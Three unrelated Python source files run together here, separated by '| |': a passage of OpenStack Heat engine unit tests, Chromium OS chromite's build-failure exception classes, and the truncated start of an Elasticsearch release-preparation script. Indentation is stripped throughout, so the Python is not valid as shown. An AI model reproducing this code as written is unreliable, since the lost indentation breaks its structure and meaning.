self.ctx.roles = [cfg.CONF.heat_stack_user_role]
self.m.StubOutWithMock(service.EngineService, '_authorize_stack_user')
service.EngineService._authorize_stack_user(self.ctx, mox.IgnoreArg(),
'foo').AndReturn(False)
self.m.ReplayAll()
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.describe_stack_resource,
self.ctx, self.stack.identifier(), 'foo')
self.assertEqual(exception.Forbidden, ex.exc_info[0])
self.m.VerifyAll()
@tools.stack_context('service_resources_describe_test_stack')
def test_stack_resources_describe(self):
self.m.StubOutWithMock(parser.Stack, 'load')
parser.Stack.load(self.ctx,
stack=mox.IgnoreArg()).AndReturn(self.stack)
self.m.ReplayAll()
resources = self.eng.describe_stack_resources(self.ctx,
self.stack.identifier(),
'WebServer')
self.assertEqual(1, len(resources))
r = resources[0]
self.assertIn('resource_identity', r)
self.assertIn('description', r)
self.assertIn('updated_time', r)
self.assertIn('stack_identity', r)
self.assertIsNotNone(r['stack_identity'])
self.assertIn('stack_name', r)
self.assertEqual(self.stack.name, r['stack_name'])
self.assertIn('resource_status', r)
self.assertIn('resource_status_reason', r)
self.assertIn('resource_type', r)
self.assertIn('physical_resource_id', r)
self.assertIn('resource_name', r)
self.assertEqual('WebServer', r['resource_name'])
self.m.VerifyAll()
@tools.stack_context('service_resources_describe_no_filter_test_stack')
def test_stack_resources_describe_no_filter(self):
self.m.StubOutWithMock(parser.Stack, 'load')
parser.Stack.load(self.ctx,
stack=mox.IgnoreArg()).AndReturn(self.stack)
self.m.ReplayAll()
resources = self.eng.describe_stack_resources(self.ctx,
self.stack.identifier(),
None)
self.assertEqual(1, len(resources))
r = resources[0]
self.assertIn('resource_name', r)
self.assertEqual('WebServer', r['resource_name'])
self.m.VerifyAll()
def test_stack_resources_describe_bad_lookup(self):
self.m.StubOutWithMock(service.EngineService, '_get_stack')
service.EngineService._get_stack(
self.ctx, None).AndRaise(TypeError)
self.m.ReplayAll()
self.assertRaises(TypeError,
self.eng.describe_stack_resources,
self.ctx, None, 'WebServer')
self.m.VerifyAll()
def test_stack_resources_describe_nonexist_stack(self):
non_exist_identifier = identifier.HeatIdentifier(
self.ctx.tenant_id, 'wibble',
'18d06e2e-44d3-4bef-9fbf-52480d604b02')
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.describe_stack_resources,
self.ctx, non_exist_identifier, 'WebServer')
self.assertEqual(exception.StackNotFound, ex.exc_info[0])
@tools.stack_context('find_phys_res_stack')
def test_find_physical_resource(self):
resources = self.eng.describe_stack_resources(self.ctx,
self.stack.identifier(),
None)
phys_id = resources[0]['physical_resource_id']
result = self.eng.find_physical_resource(self.ctx, phys_id)
self.assertIsInstance(result, dict)
resource_identity = identifier.ResourceIdentifier(**result)
self.assertEqual(self.stack.identifier(), resource_identity.stack())
self.assertEqual('WebServer', resource_identity.resource_name)
def test_find_physical_resource_nonexist(self):
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.find_physical_resource,
self.ctx, 'foo')
self.assertEqual(exception.PhysicalResourceNotFound, ex.exc_info[0])
@tools.stack_context('service_resources_list_test_stack')
def test_stack_resources_list(self):
self.m.StubOutWithMock(parser.Stack, 'load')
parser.Stack.load(self.ctx,
stack=mox.IgnoreArg()).AndReturn(self.stack)
self.m.ReplayAll()
resources = self.eng.list_stack_resources(self.ctx,
self.stack.identifier())
self.assertEqual(1, len(resources))
r = resources[0]
self.assertIn('resource_identity', r)
self.assertIn('updated_time', r)
self.assertIn('physical_resource_id', r)
self.assertIn('resource_name', r)
self.assertEqual('WebServer', r['resource_name'])
self.assertIn('resource_status', r)
self.assertIn('resource_status_reason', r)
self.assertIn('resource_type', r)
self.m.VerifyAll()
@mock.patch.object(parser.Stack, 'load')
@tools.stack_context('service_resources_list_test_stack_with_depth')
def test_stack_resources_list_with_depth(self, mock_load):
mock_load.return_value = self.stack
resources = six.itervalues(self.stack)
self.stack.iter_resources = mock.Mock(return_value=resources)
resources = self.eng.list_stack_resources(self.ctx,
self.stack.identifier(),
2)
self.stack.iter_resources.assert_called_once_with(2)
@mock.patch.object(parser.Stack, 'load')
@tools.stack_context('service_resources_list_test_stack_with_max_depth')
def test_stack_resources_list_with_max_depth(self, mock_load):
mock_load.return_value = self.stack
resources = six.itervalues(self.stack)
self.stack.iter_resources = mock.Mock(return_value=resources)
resources = self.eng.list_stack_resources(self.ctx,
self.stack.identifier(),
99)
max_depth = cfg.CONF.max_nested_stack_depth
self.stack.iter_resources.assert_called_once_with(max_depth)
@mock.patch.object(parser.Stack, 'load')
def test_stack_resources_list_deleted_stack(self, mock_load):
stack = tools.setup_stack('resource_list_deleted_stack', self.ctx)
stack_id = stack.identifier()
mock_load.return_value = stack
tools.clean_up_stack(stack)
resources = self.eng.list_stack_resources(self.ctx, stack_id)
self.assertEqual(1, len(resources))
res = resources[0]
self.assertEqual('DELETE', res['resource_action'])
self.assertEqual('COMPLETE', res['resource_status'])
def test_stack_resources_list_nonexist_stack(self):
non_exist_identifier = identifier.HeatIdentifier(
self.ctx.tenant_id, 'wibble',
'18d06e2e-44d3-4bef-9fbf-52480d604b02')
stack_not_found_exc = exception.StackNotFound(stack_name='test')
self.m.StubOutWithMock(service.EngineService, '_get_stack')
service.EngineService._get_stack(
self.ctx, non_exist_identifier, show_deleted=True
).AndRaise(stack_not_found_exc)
self.m.ReplayAll()
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.list_stack_resources,
self.ctx, non_exist_identifier)
self.assertEqual(exception.StackNotFound, ex.exc_info[0])
self.m.VerifyAll()
def _stack_create(self, stack_name):
stack = tools.get_stack(stack_name, self.ctx, policy_template)
tools.setup_keystone_mocks(self.m, stack)
self.m.ReplayAll()
stack.store()
stack.create()
self.m.StubOutWithMock(service.EngineService, '_get_stack')
s = stack_object.Stack.get_by_id(self.ctx, stack.id)
service.EngineService._get_stack(self.ctx,
stack.identifier()).AndReturn(s)
self.m.ReplayAll()
return stack
def test_signal_reception_async(self):
self.eng.thread_group_mgr = tools.DummyThreadGroupMgrLogStart()
stack_name = 'signal_reception_async'
self.stack = self._stack_create(stack_name)
test_data = {'food': 'yum'}
self.m.ReplayAll()
self.eng.resource_signal(self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy',
test_data)
self.assertEqual([(self.stack.id, mox.IgnoreArg())],
self.eng.thread_group_mgr.started)
self.m.VerifyAll()
def test_signal_reception_sync(self):
stack_name = 'signal_reception_sync'
self.stack = self._stack_create(stack_name)
test_data = {'food': 'yum'}
self.m.StubOutWithMock(res.Resource, 'signal')
res.Resource.signal(mox.IgnoreArg(), False).AndReturn(None)
self.m.ReplayAll()
self.eng.resource_signal(self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy',
test_data,
sync_call=True)
self.m.VerifyAll()
def test_signal_reception_no_resource(self):
stack_name = 'signal_reception_no_resource'
self.stack = self._stack_create(stack_name)
test_data = {'food': 'yum'}
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.resource_signal, self.ctx,
dict(self.stack.identifier()),
'resource_does_not_exist',
test_data)
self.assertEqual(exception.ResourceNotFound, ex.exc_info[0])
self.m.VerifyAll()
def test_signal_reception_unavailable_resource(self):
stack_name = 'signal_reception_unavailable_resource'
stack = tools.get_stack(stack_name, self.ctx, policy_template)
stack.store()
self.stack = stack
self.m.StubOutWithMock(parser.Stack, 'load')
parser.Stack.load(
self.ctx, stack=mox.IgnoreArg(),
use_stored_context=mox.IgnoreArg()
).AndReturn(self.stack)
self.m.ReplayAll()
test_data = {'food': 'yum'}
self.m.StubOutWithMock(service.EngineService, '_get_stack')
s = stack_object.Stack.get_by_id(self.ctx, self.stack.id)
service.EngineService._get_stack(self.ctx,
self.stack.identifier()).AndReturn(s)
self.m.ReplayAll()
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.resource_signal, self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy',
test_data)
self.assertEqual(exception.ResourceNotAvailable, ex.exc_info[0])
self.m.VerifyAll()
def test_signal_returns_metadata(self):
self.stack = self._stack_create('signal_reception')
rsrc = self.stack['WebServerScaleDownPolicy']
test_metadata = {'food': 'yum'}
rsrc.metadata_set(test_metadata)
self.m.StubOutWithMock(res.Resource, 'signal')
res.Resource.signal(mox.IgnoreArg(), False).AndReturn(None)
self.m.ReplayAll()
md = self.eng.resource_signal(self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy', None,
sync_call=True)
self.assertEqual(test_metadata, md)
self.m.VerifyAll()
def test_signal_unset_invalid_hook(self):
self.stack = self._stack_create('signal_unset_invalid_hook')
details = {'unset_hook': 'invalid_hook'}
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.resource_signal,
self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy',
details)
msg = 'Invalid hook type "invalid_hook"'
self.assertIn(msg, six.text_type(ex.exc_info[1]))
self.assertEqual(exception.InvalidBreakPointHook,
ex.exc_info[0])
self.m.VerifyAll()
def test_signal_unset_not_defined_hook(self):
self.stack = self._stack_create('signal_unset_not_defined_hook')
details = {'unset_hook': 'pre-update'}
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.resource_signal,
self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy',
details)
msg = ('The "pre-update" hook is not defined on '
'AWSScalingPolicy "WebServerScaleDownPolicy"')
self.assertIn(msg, six.text_type(ex.exc_info[1]))
self.assertEqual(exception.InvalidBreakPointHook,
ex.exc_info[0])
self.m.VerifyAll()
def test_signal_calls_metadata_update(self):
stack = tools.get_stack('signal_reception', self.ctx, policy_template)
self.stack = stack
tools.setup_keystone_mocks(self.m, stack)
self.m.ReplayAll()
stack.store()
stack.create()
self.m.StubOutWithMock(service.EngineService, '_get_stack')
s = stack_object.Stack.get_by_id(self.ctx, self.stack.id)
service.EngineService._get_stack(self.ctx,
self.stack.identifier()).AndReturn(s)
self.m.StubOutWithMock(res.Resource, 'signal')
res.Resource.signal(mox.IgnoreArg(), False).AndReturn(None)
self.m.StubOutWithMock(res.Resource, 'metadata_update')
# this will be called once for the Random resource
res.Resource.metadata_update().AndReturn(None)
self.m.ReplayAll()
self.eng.resource_signal(self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy', None,
sync_call=True)
self.m.VerifyAll()
def test_signal_no_calls_metadata_update(self):
stack = tools.get_stack('signal_reception', self.ctx, policy_template)
self.stack = stack
tools.setup_keystone_mocks(self.m, stack)
self.m.ReplayAll()
stack.store()
stack.create()
res.Resource.signal_needs_metadata_updates = False
self.m.StubOutWithMock(service.EngineService, '_get_stack')
s = stack_object.Stack.get_by_id(self.ctx, self.stack.id)
service.EngineService._get_stack(self.ctx,
self.stack.identifier()).AndReturn(s)
self.m.StubOutWithMock(res.Resource, 'signal')
res.Resource.signal(mox.IgnoreArg(), False).AndReturn(None)
# this will never be called
self.m.StubOutWithMock(res.Resource, 'metadata_update')
self.m.ReplayAll()
self.eng.resource_signal(self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy', None,
sync_call=True)
self.m.VerifyAll()
res.Resource.signal_needs_metadata_updates = True
def test_stack_list_all_empty(self):
sl = self.eng.list_stacks(self.ctx)
self.assertEqual(0, len(sl))
def test_stack_describe_all_empty(self):
sl = self.eng.show_stack(self.ctx, None)
self.assertEqual(0, len(sl))
def test_lazy_load_resources(self):
stack_name = 'lazy_load_test'
lazy_load_template = {
'HeatTemplateFormatVersion': '2012-12-12',
'Resources': {
'foo': {'Type': 'GenericResourceType'},
'bar': {
'Type': 'ResourceWithPropsType',
'Properties': {
'Foo': {'Ref': 'foo'},
}
}
}
}
templ = templatem.Template(lazy_load_template)
stack = parser.Stack(self.ctx, stack_name, templ)
self.assertIsNone(stack._resources)
self.assertIsNone(stack._dependencies)
resources = stack.resources
self.assertIsInstance(resources, dict)
self.assertEqual(2, len(resources))
self.assertIsInstance(resources.get('foo'),
generic_rsrc.GenericResource)
self.assertIsInstance(resources.get('bar'),
generic_rsrc.ResourceWithProps)
stack_dependencies = stack.dependencies
self.assertIsInstance(stack_dependencies, dependencies.Dependencies)
self.assertEqual(2, len(stack_dependencies.graph()))
def _preview_stack(self):
res._register_class('GenericResource1', generic_rsrc.GenericResource)
res._register_class('GenericResource2', generic_rsrc.GenericResource)
args = {}
params = {}
files = None
stack_name = 'SampleStack'
tpl = {'HeatTemplateFormatVersion': '2012-12-12',
'Description': 'Lorem ipsum.',
'Resources': {
'SampleResource1': {'Type': 'GenericResource1'},
'SampleResource2': {'Type': 'GenericResource2'}}}
return self.eng.preview_stack(self.ctx, stack_name, tpl,
params, files, args)
def test_preview_stack_returns_a_stack(self):
stack = self._preview_stack()
expected_identity = {'path': '',
'stack_id': 'None',
'stack_name': 'SampleStack',
'tenant': 'stack_service_test_tenant'}
self.assertEqual(expected_identity, stack['stack_identity'])
self.assertEqual('SampleStack', stack['stack_name'])
self.assertEqual('Lorem ipsum.', stack['description'])
def test_preview_stack_returns_list_of_resources_in_stack(self):
stack = self._preview_stack()
self.assertIsInstance(stack['resources'], list)
self.assertEqual(2, len(stack['resources']))
resource_types = set(r['resource_type'] for r in stack['resources'])
self.assertIn('GenericResource1', resource_types)
self.assertIn('GenericResource2', resource_types)
resource_names = set(r['resource_name'] for r in stack['resources'])
self.assertIn('SampleResource1', resource_names)
self.assertIn('SampleResource2', resource_names)
def test_preview_stack_validates_new_stack(self):
exc = exception.StackExists(stack_name='Validation Failed')
self.eng._validate_new_stack = mock.Mock(side_effect=exc)
ex = self.assertRaises(dispatcher.ExpectedException,
self._preview_stack)
self.assertEqual(exception.StackExists, ex.exc_info[0])
@mock.patch.object(service.api, 'format_stack_preview', new=mock.Mock())
@mock.patch.object(service.parser, 'Stack')
def test_preview_stack_checks_stack_validity(self, mock_parser):
exc = exception.StackValidationFailed(message='Validation Failed')
mock_parsed_stack = mock.Mock()
mock_parsed_stack.validate.side_effect = exc
mock_parser.return_value = mock_parsed_stack
ex = self.assertRaises(dispatcher.ExpectedException,
self._preview_stack)
self.assertEqual(exception.StackValidationFailed, ex.exc_info[0])
@mock.patch.object(stack_object.Stack, 'get_by_name')
def test_validate_new_stack_checks_existing_stack(self, mock_stack_get):
mock_stack_get.return_value = 'existing_db_stack'
tmpl = templatem.Template(
{'HeatTemplateFormatVersion': '2012-12-12'})
self.assertRaises(exception.StackExists, self.eng._validate_new_stack,
self.ctx, 'test_existing_stack', tmpl)
@mock.patch.object(stack_object.Stack, 'count_all')
def test_validate_new_stack_checks_stack_limit(self, mock_db_count):
cfg.CONF.set_override('max_stacks_per_tenant', 99)
mock_db_count.return_value = 99
template = templatem.Template(
{'HeatTemplateFormatVersion': '2012-12-12'})
self.assertRaises(exception.RequestLimitExceeded,
self.eng._validate_new_stack,
self.ctx, 'test_existing_stack', template)
def test_validate_new_stack_checks_incorrect_keywords_in_resource(self):
template = {'heat_template_version': '2013-05-23',
'resources': {
'Res': {'Type': 'GenericResource1'}}}
parsed_template = templatem.Template(template)
ex = self.assertRaises(exception.StackValidationFailed,
self.eng._validate_new_stack,
self.ctx, 'test_existing_stack',
parsed_template)
msg = (u'"Type" is not a valid keyword '
'inside a resource definition')
self.assertEqual(msg, six.text_type(ex))
def test_validate_new_stack_checks_incorrect_sections(self):
template = {'heat_template_version': '2013-05-23',
'unknown_section': {
'Res': {'Type': 'GenericResource1'}}}
parsed_template = templatem.Template(template)
ex = self.assertRaises(exception.StackValidationFailed,
self.eng._validate_new_stack,
self.ctx, 'test_existing_stack',
parsed_template)
msg = u'The template section is invalid: unknown_section'
self.assertEqual(msg, six.text_type(ex))
def test_validate_new_stack_checks_resource_limit(self):
cfg.CONF.set_override('max_resources_per_stack', 5)
template = {'HeatTemplateFormatVersion': '2012-12-12',
'Resources': {
'Res1': {'Type': 'GenericResource1'},
'Res2': {'Type': 'GenericResource1'},
'Res3': {'Type': 'GenericResource1'},
'Res4': {'Type': 'GenericResource1'},
'Res5': {'Type': 'GenericResource1'},
'Res6': {'Type': 'GenericResource1'}}}
parsed_template = templatem.Template(template)
self.assertRaises(exception.RequestLimitExceeded,
self.eng._validate_new_stack,
self.ctx, 'test_existing_stack', parsed_template)
def test_validate_new_stack_handle_assertion_error(self):
tmpl = mock.MagicMock()
expected_message = 'Expected assertion error'
tmpl.validate.side_effect = AssertionError(expected_message)
exc = self.assertRaises(AssertionError, self.eng._validate_new_stack,
self.ctx, 'stack_name', tmpl)
self.assertEqual(expected_message, six.text_type(exc))
@mock.patch('heat.engine.service.ThreadGroupManager',
return_value=mock.Mock())
@mock.patch.object(stack_object.Stack, 'get_all')
@mock.patch('heat.engine.stack_lock.StackLock',
return_value=mock.Mock())
@mock.patch.object(parser.Stack, 'load')
@mock.patch.object(context, 'get_admin_context')
def test_engine_reset_stack_status(
self,
mock_admin_context,
mock_stack_load,
mock_stacklock,
mock_get_all,
mock_thread):
mock_admin_context.return_value = self.ctx
db_stack = mock.MagicMock()
db_stack.id = 'foo'
db_stack.status = 'IN_PROGRESS'
db_stack.status_reason = None
mock_get_all.return_value = [db_stack]
fake_stack = mock.MagicMock()
fake_stack.action = 'CREATE'
fake_stack.id = 'foo'
fake_stack.status = 'IN_PROGRESS'
mock_stack_load.return_value = fake_stack
fake_lock = mock.MagicMock()
fake_lock.get_engine_id.return_value = 'old-engine'
fake_lock.acquire.return_value = None
mock_stacklock.return_value = fake_lock
self.eng.thread_group_mgr = mock_thread
self.eng.reset_stack_status()
mock_admin_context.assert_called_once_with()
filters = {'status': parser.Stack.IN_PROGRESS}
mock_get_all.assert_called_once_with(self.ctx,
filters=filters,
tenant_safe=False)
mock_stack_load.assert_called_once_with(self.ctx,
stack=db_stack,
use_stored_context=True)
mock_thread.start_with_acquired_lock.assert_called_once_with(
fake_stack, fake_lock,
self.eng.set_stack_and_resource_to_failed, fake_stack
)
def test_set_stack_and_resource_to_failed(self):
def fake_stack():
stk = mock.MagicMock()
stk.action = 'CREATE'
stk.id = 'foo'
stk.status = 'IN_PROGRESS'
stk.FAILED = 'FAILED'
def mock_stack_state_set(a, s, reason):
stk.status = s
stk.action = a
stk.status_reason = reason
stk.state_set = mock_stack_state_set
return stk
def fake_stack_resource(name, action, status):
rs = mock.MagicMock()
rs.name = name
rs.action = action
rs.status = status
rs.IN_PROGRESS = 'IN_PROGRESS'
rs.FAILED = 'FAILED'
def mock_resource_state_set(a, s, reason='engine_down'):
rs.status = s
rs.action = a
rs.status_reason = reason
rs.state_set = mock_resource_state_set
return rs
test_stack = fake_stack()
test_stack.resources = {
'r1': fake_stack_resource('r1', 'UPDATE', 'COMPLETE'),
'r2': fake_stack_resource('r2', 'UPDATE', 'IN_PROGRESS'),
'r3': fake_stack_resource('r3', 'UPDATE', 'FAILED')}
self.eng.set_stack_and_resource_to_failed(test_stack)
self.assertEqual('FAILED', test_stack.status)
self.assertEqual('COMPLETE', test_stack.resources.get('r1').status)
self.assertEqual('FAILED', test_stack.resources.get('r2').status)
self.assertEqual('FAILED', test_stack.resources.get('r3').status)
| |
# Copyright 2014 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Classes of failure types."""
import collections
import sys
import traceback
from chromite.cbuildbot import portage_utilities
from chromite.lib import cros_build_lib
class StepFailure(Exception):
"""StepFailure exceptions indicate that a cbuildbot step failed.
Exceptions that derive from StepFailure should meet the following
criteria:
1) The failure indicates that a cbuildbot step failed.
2) The necessary information to debug the problem has already been
printed in the logs for the stage that failed.
3) __str__() should be brief enough to include in a Commit Queue
failure message.
"""
def __init__(self, message=''):
"""Constructor.
Args:
message: An error message.
"""
Exception.__init__(self, message)
self.args = (message,)
def __str__(self):
"""Stringify the message."""
return self.message
# A namedtuple to hold information of an exception.
ExceptInfo = collections.namedtuple(
'ExceptInfo', ['type', 'str', 'traceback'])
def CreateExceptInfo(exception, tb):
"""Creates a list of ExceptInfo objects from |exception| and |tb|.
Creates an ExceptInfo object from |exception| and |tb|. If
|exception| is a CompoundFailure with non-empty list of exc_infos,
simly returns exception.exc_infos. Note that we do not preserve type
of |exception| in this case.
Args:
exception: The exception.
tb: The textual traceback.
Returns:
A list of ExceptInfo objects.
"""
if issubclass(exception.__class__, CompoundFailure) and exception.exc_infos:
return exception.exc_infos
return [ExceptInfo(exception.__class__, str(exception), tb)]
class CompoundFailure(StepFailure):
"""An exception that contains a list of ExceptInfo objects."""
def __init__(self, message='', exc_infos=None):
"""Initializes an CompoundFailure instance.
Args:
message: A string describing the failure.
exc_infos: A list of ExceptInfo objects.
"""
self.exc_infos = exc_infos if exc_infos else []
if not message:
# By default, print the type and string of each ExceptInfo object.
message = '\n'.join(['%s: %s' % (e.type, e.str) for e in self.exc_infos])
super(CompoundFailure, self).__init__(message=message)
def ToFullMessage(self):
"""Returns a string with all information in self.exc_infos."""
if self.HasEmptyList():
# Fall back to return self.message if list is empty.
return self.message
else:
# This includes the textual traceback(s).
return '\n'.join(['{e.type}: {e.str}\n{e.traceback}'.format(e=ex) for
ex in self.exc_infos])
def HasEmptyList(self):
"""Returns True if self.exc_infos is empty."""
return not bool(self.exc_infos)
def HasFailureType(self, cls):
"""Returns True if any of the failures matches |cls|."""
return any(issubclass(x.type, cls) for x in self.exc_infos)
def MatchesFailureType(self, cls):
"""Returns True if all failures matches |cls|."""
return (not self.HasEmptyList() and
all(issubclass(x.type, cls) for x in self.exc_infos))
def HasFatalFailure(self, whitelist=None):
"""Determine if there are non-whitlisted failures.
Args:
whitelist: A list of whitelisted exception types.
Returns:
Returns True if any failure is not in |whitelist|.
"""
if not whitelist:
return not self.HasEmptyList()
for ex in self.exc_infos:
if all(not issubclass(ex.type, cls) for cls in whitelist):
return True
return False
class SetFailureType(object):
"""A wrapper to re-raise the exception as the pre-set type."""
def __init__(self, category_exception, source_exception=None):
"""Initializes the decorator.
Args:
category_exception: The exception type to re-raise as. It must be
a subclass of CompoundFailure.
source_exception: The exception types to re-raise. By default, re-raise
all Exception classes.
"""
assert issubclass(category_exception, CompoundFailure)
self.category_exception = category_exception
self.source_exception = source_exception
if self.source_exception is None:
self.source_exception = Exception
def __call__(self, functor):
"""Returns a wrapped function."""
def wrapped_functor(*args, **kwargs):
try:
return functor(*args, **kwargs)
except self.source_exception:
# Get the information about the original exception.
exc_type, exc_value, _ = sys.exc_info()
exc_traceback = traceback.format_exc()
if issubclass(exc_type, self.category_exception):
# Do not re-raise if the exception is a subclass of the set
# exception type because it offers more information.
raise
else:
exc_infos = CreateExceptInfo(exc_value, exc_traceback)
raise self.category_exception(exc_infos=exc_infos)
return wrapped_functor
class RetriableStepFailure(StepFailure):
"""This exception is thrown when a step failed, but should be retried."""
class BuildScriptFailure(StepFailure):
"""This exception is thrown when a build command failed.
It is intended to provide a shorter summary of what command failed,
for usage in failure messages from the Commit Queue, so as to ensure
that developers aren't spammed with giant error messages when common
commands (e.g. build_packages) fail.
"""
def __init__(self, exception, shortname):
"""Construct a BuildScriptFailure object.
Args:
exception: A RunCommandError object.
shortname: Short name for the command we're running.
"""
StepFailure.__init__(self)
assert isinstance(exception, cros_build_lib.RunCommandError)
self.exception = exception
self.shortname = shortname
self.args = (exception, shortname)
def __str__(self):
"""Summarize a build command failure briefly."""
result = self.exception.result
if result.returncode:
return '%s failed (code=%s)' % (self.shortname, result.returncode)
else:
return self.exception.msg
class PackageBuildFailure(BuildScriptFailure):
"""This exception is thrown when packages fail to build."""
def __init__(self, exception, shortname, failed_packages):
"""Construct a PackageBuildFailure object.
Args:
exception: The underlying exception.
shortname: Short name for the command we're running.
failed_packages: List of packages that failed to build.
"""
BuildScriptFailure.__init__(self, exception, shortname)
self.failed_packages = set(failed_packages)
self.args = (exception, shortname, failed_packages)
def __str__(self):
return ('Packages failed in %s: %s'
% (self.shortname, ' '.join(sorted(self.failed_packages))))
class InfrastructureFailure(CompoundFailure):
"""Raised if a stage fails due to infrastructure issues."""
# Chrome OS Test Lab failures.
class TestLabFailure(InfrastructureFailure):
"""Raised if a stage fails due to hardware lab infrastructure issues."""
# Gerrit-on-Borg failures.
class GoBFailure(InfrastructureFailure):
"""Raised if a stage fails due to Gerrit-on-Borg (GoB) issues."""
class GoBQueryFailure(GoBFailure):
"""Raised if a stage fails due to Gerrit-on-Borg (GoB) query errors."""
class GoBSubmitFailure(GoBFailure):
"""Raised if a stage fails due to Gerrit-on-Borg (GoB) submission errors."""
class GoBFetchFailure(GoBFailure):
"""Raised if a stage fails due to Gerrit-on-Borg (GoB) fetch errors."""
# Google Storage failures.
class GSFailure(InfrastructureFailure):
"""Raised if a stage fails due to Google Storage (GS) issues."""
class GSUploadFailure(GSFailure):
"""Raised if a stage fails due to Google Storage (GS) upload issues."""
class GSDownloadFailure(GSFailure):
"""Raised if a stage fails due to Google Storage (GS) download issues."""
# Builder failures.
class BuilderFailure(InfrastructureFailure):
"""Raised if a stage fails due to builder issues."""
# Crash collection service failures.
class CrashCollectionFailure(InfrastructureFailure):
"""Raised if a stage fails due to crash collection services."""
class BuildFailureMessage(object):
"""Message indicating that changes failed to be validated."""
def __init__(self, message, tracebacks, internal, reason, builder):
"""Create a BuildFailureMessage object.
Args:
message: The message to print.
tracebacks: Exceptions received by individual builders, if any.
internal: Whether this failure occurred on an internal builder.
reason: A string describing the failure.
builder: The builder the failure occurred on.
"""
# Convert each of the input arguments into simple Python datastructures
# (i.e. not generators) that can be easily pickled.
self.message = str(message)
self.tracebacks = tuple(tracebacks)
self.internal = bool(internal)
self.reason = str(reason)
self.builder = str(builder)
def __str__(self):
return self.message
def MatchesFailureType(self, cls):
"""Check if all of the tracebacks match the specified failure type."""
for tb in self.tracebacks:
if not isinstance(tb.exception, cls):
if (isinstance(tb.exception, CompoundFailure) and
tb.exception.MatchesFailureType(cls)):
# If the exception is a CompoundFailure instance and all its
# stored exceptions match |cls|, it meets the criteria.
continue
else:
return False
return True
def HasFailureType(self, cls):
"""Check if any of the failures match the specified failure type."""
for tb in self.tracebacks:
if isinstance(tb.exception, cls):
return True
if (isinstance(tb.exception, CompoundFailure) and
tb.exception.HasFailureType(cls)):
# If the exception is a CompoundFailure instance and any of its
# stored exceptions match |cls|, it meets the criteria.
return True
return False
def IsPackageBuildFailure(self):
"""Check if all of the failures are package build failures."""
return self.MatchesFailureType(PackageBuildFailure)
def FindPackageBuildFailureSuspects(self, changes):
"""Figure out what changes probably caused our failures.
We use a fairly simplistic algorithm to calculate breakage: If you changed
a package, and that package broke, you probably broke the build. If there
were multiple changes to a broken package, we fail them all.
Some safeguards are implemented to ensure that bad changes are kicked out:
1) Changes to overlays (e.g. ebuilds, eclasses, etc.) are always kicked
out if the build fails.
2) If a package fails that nobody changed, we kick out all of the
changes.
3) If any failures occur that we can't explain, we kick out all of the
changes.
It is certainly possible to trick this algorithm: If one developer submits
a change to libchromeos that breaks the power_manager, and another developer
submits a change to the power_manager at the same time, only the
power_manager change will be kicked out. That said, in that situation, the
libchromeos change will likely be kicked out on the next run, thanks to
safeguard #2 above.
Args:
changes: List of changes to examine.
Returns:
Set of changes that likely caused the failure.
"""
blame_everything = False
suspects = set()
for tb in self.tracebacks:
for package in tb.exception.failed_packages:
failed_projects = portage_utilities.FindWorkonProjects([package])
blame_assigned = False
for change in changes:
if change.project in failed_projects:
blame_assigned = True
suspects.add(change)
if not blame_assigned:
blame_everything = True
if blame_everything or not suspects:
suspects = changes[:]
else:
# Never treat changes to overlays as innocent.
suspects.update(change for change in changes
if '/overlays/' in change.project)
return suspects
| |
# Licensed to Elasticsearch under one or more contributor
# license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright
# ownership. Elasticsearch licenses this file to you under
# the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on
# an 'AS IS' BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
# Prepare a release
#
# 1. Update the Version.java to remove the snapshot bit
# 2. Remove the -SNAPSHOT suffix in all pom.xml files
#
# USAGE:
#
# python3 ./dev-tools/prepare-release.py
#
# Note: Ensure the script is run from the elasticsearch top level directory
#
import fnmatch
import argparse
from prepare_release_update_documentation import update_reference_docs
import subprocess
import tempfile
import re
import os
import shutil
from functools import partial
from os.path import expanduser
import sys
VERSION_FILE = 'core/src/main/java/org/elasticsearch/Version.java'
POM_FILE = 'pom.xml'
MAIL_TEMPLATE = """
Hi all
The new release candidate for %(version)s is now available, including the x-plugins and RPM/deb repos. This release is based on:
* Elasticsearch commit: %(hash)s - https://github.com/elastic/elasticsearch/commit/%(hash)s
* X-Plugins commit: FILL_IN_X-PLUGINS_HASH - https://github.com/elastic/x-plugins/commit/FILL_IN_X-PLUGINS_HASH
The packages may be downloaded from the following URLs:
* ZIP - https://%(bucket)s/elasticsearch/staging/%(version)s-%(hash)s/org/elasticsearch/distribution/zip/elasticsearch/%(version)s/elasticsearch-%(version)s.zip
* tar.gz - https://%(bucket)s/elasticsearch/staging/%(version)s-%(hash)s/org/elasticsearch/distribution/tar/elasticsearch/%(version)s/elasticsearch-%(version)s.tar.gz
* RPM - https://%(bucket)s/elasticsearch/staging/%(version)s-%(hash)s/org/elasticsearch/distribution/rpm/elasticsearch/%(version)s/elasticsearch-%(version)s.rpm
* deb - https://%(bucket)s/elasticsearch/staging/%(version)s-%(hash)s/org/elasticsearch/distribution/deb/elasticsearch/%(version)s/elasticsearch-%(version)s.deb
Plugins can be installed as follows:
bin/plugin -Des.plugins.staging=true install cloud-aws
The same goes for the x-plugins:
bin/plugin -Des.plugins.staging=true install license
bin/plugin -Des.plugins.staging=true install marvel-agent
